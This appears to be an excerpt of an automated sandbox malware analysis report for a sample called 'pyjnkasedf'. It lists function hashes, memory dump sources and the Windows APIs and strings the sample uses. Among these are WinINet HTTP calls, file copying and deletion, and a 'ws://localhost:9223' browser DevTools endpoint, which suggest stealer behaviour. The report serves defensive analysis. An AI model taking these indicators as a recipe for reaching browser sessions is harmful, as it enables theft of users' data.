                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 54b9c82a713e1647d260def757d0a948b7046694d7ad337d743321e3225f6e9f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2911ED5810D2E059CB1B8B7541A45A2BFE25DAF10977ED0DDD4D80E3A7C0A7C58BD732
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e23c2beb31796bd73ba3405afa20eb797d15acb8a7dbc67d580fc6a693144fab
                                                                                                                                                                                                                                                        • Instruction ID: 0e5454ff1cf141f6970ade37cfd018851782c4dac029dc11aa7d775549405aef
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e23c2beb31796bd73ba3405afa20eb797d15acb8a7dbc67d580fc6a693144fab
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6111ED4810D2E059CB1B8B3540A49A2BFE25DAF10977ED0CDD4D80E3A7C0ABC58BE732
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3a93f6a8cd4d47df05c78eab3a44aff0d759dd350f23cc4f4d7f68ebc0c78d12
                                                                                                                                                                                                                                                        • Instruction ID: 22116eef3f2273cfe5a8c2e9c41e65b8715a71c3a701b7abc3ba02d849d03f4d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3a93f6a8cd4d47df05c78eab3a44aff0d759dd350f23cc4f4d7f68ebc0c78d12
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EEE0C2322616449FC204CF18CCD4E1273A9EB8C754B1B006CE8025B712C730BC04CA21
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
                                                                                                                                                                                                                                                        • Instruction ID: a1635671767398927da0aa1816190fc69100bda25571e9e45a237a418de66b7e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 85C012B1445208EFD708CB84E512B56B7FCE704720F14406DE40D47740D63A6B00C655
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 7efd6142749fb6bd35262aa098dca2313432ac870eb67428dbbe6dded8a0cce0
                                                                                                                                                                                                                                                        • Instruction ID: b23bb995dfb30c632528fdc81509a2daafe07b1b64e7ca450f6c4b88134f84f9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7efd6142749fb6bd35262aa098dca2313432ac870eb67428dbbe6dded8a0cce0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51A00236161E83C6D7535614876630971A6AB41AD4F054A64584184A40DB6DC678E501
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(?,0066120F), ref: 004225D1
                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00422629
                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00422681
                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(?,00660FFB), ref: 004226B9
                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00422711
                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0042277B
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: lstrcat
                                                                                                                                                                                                                                                        • String ID: d=E
                                                                                                                                                                                                                                                        • API String ID: 4038537762-3703654223
                                                                                                                                                                                                                                                        • Opcode ID: 6b258883751747a047630860852b76eb666baa1f2a0d48bec97887eab96c2c49
                                                                                                                                                                                                                                                        • Instruction ID: 787f5a1883bd1a92c764b1f5073ff24f0c1a0a171341e5f139d16835dd81bd73
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6b258883751747a047630860852b76eb666baa1f2a0d48bec97887eab96c2c49
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D27129B5A12218DFD344CF58DC94DAA73F9BF892217440468E829E7362D774EE09CB78
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6F7D0000,HttpQueryInfoA), ref: 0043E83E
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6F7D0000,InternetSetOptionA), ref: 0043E887
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressProc
                                                                                                                                                                                                                                                        • String ID: HttpQueryInfoA$InternetSetOptionA$m&q9
                                                                                                                                                                                                                                                        • API String ID: 190572456-3642299867
                                                                                                                                                                                                                                                        • Opcode ID: e884e536bd4fb761ddbb9277ab380c44a344506145dd67f0df72f5f54d870151
                                                                                                                                                                                                                                                        • Instruction ID: 98888633d930fc3f68b7ae1b75c13118300460b7db9654319f762892afa8a6d7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e884e536bd4fb761ddbb9277ab380c44a344506145dd67f0df72f5f54d870151
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F51AC365063099FE708CF55DCE8D91B7A5FB4D30A31406A9ED12A736BF632A901CF45
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00432784
                                                                                                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 004327F3
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: File$CopyDelete
                                                                                                                                                                                                                                                        • String ID: "R$%s\%s
                                                                                                                                                                                                                                                        • API String ID: 2687465029-1330689491
                                                                                                                                                                                                                                                        • Opcode ID: 0c235ffeb9cdb5e5402ee528d37386d9bf2a8fdb39c3761a39d7d94802ac60cf
                                                                                                                                                                                                                                                        • Instruction ID: d5026690ed90791daf1852e796855019d1112d58b0cd7ae693c2139466fe721d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c235ffeb9cdb5e5402ee528d37386d9bf2a8fdb39c3761a39d7d94802ac60cf
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE71F635A02204CFCB25DFACDD99F9DB7B6AF88305744406AE809E7365DAB0EE15CB44
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00437329
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateEvent
                                                                                                                                                                                                                                                        • String ID: d=E$d=E$d=E
                                                                                                                                                                                                                                                        • API String ID: 2692171526-2757786290
                                                                                                                                                                                                                                                        • Opcode ID: d1988c51bc93c6c7c96dfe98e9345a11fdff1b557833e9bd00fce34000985eea
                                                                                                                                                                                                                                                        • Instruction ID: 6d63f5addddcf0f202a3d96c4c4cfef29e5f3cf64ecf2c301d3244b61fc77ad2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d1988c51bc93c6c7c96dfe98e9345a11fdff1b557833e9bd00fce34000985eea
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE213B76A003158FD324CF6CDCD1A69B3F5BF98205B54856AE806D3722D774EE49CB09
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: memset
                                                                                                                                                                                                                                                        • String ID: /devtools$localhost$ws://localhost:9223
                                                                                                                                                                                                                                                        • API String ID: 2221118986-2676143373
                                                                                                                                                                                                                                                        • Opcode ID: f28d1d7685b759f1b9fa703e398c4b34b2761e0bba58c726aef41920fd6a890e
                                                                                                                                                                                                                                                        • Instruction ID: 92f363432d231bec1e3fb9884c8ea9c77849bc815585ae96951a962bcb6a1e0d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f28d1d7685b759f1b9fa703e398c4b34b2761e0bba58c726aef41920fd6a890e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 883191726003149BDB04DBA9ECC1E6A3BA9EBC4705B08016CB51AE3352DE34EE45CB58
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00402019
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CopyFile
                                                                                                                                                                                                                                                        • String ID: d=E$d=E
                                                                                                                                                                                                                                                        • API String ID: 1304948518-3333608182
                                                                                                                                                                                                                                                        • Opcode ID: f3c819ef3b7be1bc81a93b26faec0c56b614ff0994c5297cd0ea10bafbb97f72
                                                                                                                                                                                                                                                        • Instruction ID: 40807189775480ff61ea03033ac9fbf616a983455c9c9627938ee44d9787b36e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f3c819ef3b7be1bc81a93b26faec0c56b614ff0994c5297cd0ea10bafbb97f72
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01713BB67106049FD704EB6CDC94E79B3F9EF88642704402ABC09CB367DAB0E905CB69
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,00000000,05F5E0FF), ref: 004161D2
                                                                                                                                                                                                                                                        • InternetOpenA.WININET ref: 00416207
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
